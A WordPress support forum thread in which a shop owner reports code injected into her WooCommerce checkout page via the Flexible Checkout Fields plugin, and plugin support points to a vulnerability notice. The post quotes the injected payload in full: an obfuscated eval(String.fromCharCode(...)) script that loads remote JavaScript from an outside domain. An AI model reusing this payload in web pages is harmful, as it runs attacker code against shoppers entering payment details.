Title: Malicious code?
Last modified: October 30, 2020

---

# Malicious code?

 *  Resolved [georgiac44](https://wordpress.org/support/users/georgiac44/)
 * (@georgiac44)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-19/)
 * Hi there,
 * I recently noticed on my checkout page there was some random code being outputted.
 * The first was a hidden field label “SRC Optional” and the second was appended
   to the Order Notes Label and was the following:
 * Order Notes
    <script>eval(String.fromCharCode(118,97,114,32,115,99,114,105,112,116,95,116,97,103,32,61,32,100,111,99,117,109,101,110,116,46,99,114,101,97,116,101,69,108,101,109,101,110,116,40,39,115,99,114,105,112,116,39,41,59,10,115,99,114,105,112,116,95,116,97,103,46,115,101,116,65,116,116,114,105,98,117,116,101,40,39,115,114,99,39,44,39,104,116,116,112,115,58,47,47,117,109,98,114,105,97,119,97,108,107,105,110,103,46,99,111,109,47,99,111,117,110,116,101,114,47,112,105,120,101,108,46,106,115,39,41,59,10,100,111,99,117,109,101,110,116,46,104,101,97,100,46,97,112,112,101,110,100,67,104,105,108,100,40,115,99,114,105,112,116,95,116,97,103,41,59))
   </script>
 * I eventually found out it was coming from the Flexible Checkout Fields plugin
   and deleted the fields in question.
 * Is this a known issue?
 * Thanks,
 * Georgia

Viewing 2 replies - 1 through 2 (of 2 total)

 *  Plugin Support [Tomasz WP Desk](https://wordpress.org/support/users/tomaszwp/)
 * (@tomaszwp)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-19/#post-13608946)
 * Hello [@georgiac44](https://wordpress.org/support/users/georgiac44/),
 * It looks like this is a similar case to the one reported in February. Please 
   read the article below and follow the directions.
    [Flexible Checkout Fields vulnerability](https://www.wpdesk.net/blog/flexible-checkout-fields-vulnerability/)
 *  Plugin Support [Tomasz WP Desk](https://wordpress.org/support/users/tomaszwp/)
 * (@tomaszwp)
 * [5 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-19/#post-13641156)
 * I am marking this topic as resolved as we have not received any new replies.

Viewing 2 replies - 1 through 2 (of 2 total)

The topic ‘Malicious code?’ is closed to new replies.

 * ![](https://ps.w.org/flexible-checkout-fields/assets/icon-256x256.gif?rev=2522628)
 * [Flexible Checkout Fields for WooCommerce - WooCommerce Checkout Manager](https://wordpress.org/plugins/flexible-checkout-fields/)
 * [Frequently Asked Questions](https://wordpress.org/plugins/flexible-checkout-fields/#faq)
 * [Support Threads](https://wordpress.org/support/plugin/flexible-checkout-fields/)
 * [Active Topics](https://wordpress.org/support/plugin/flexible-checkout-fields/active/)
 * [Unresolved Topics](https://wordpress.org/support/plugin/flexible-checkout-fields/unresolved/)
 * [Reviews](https://wordpress.org/support/plugin/flexible-checkout-fields/reviews/)

 * 2 replies
 * 2 participants
 * Last reply from: [Tomasz WP Desk](https://wordpress.org/support/users/tomaszwp/)
 * Last activity: [5 years, 7 months ago](https://wordpress.org/support/topic/malicious-code-19/#post-13641156)
 * Status: resolved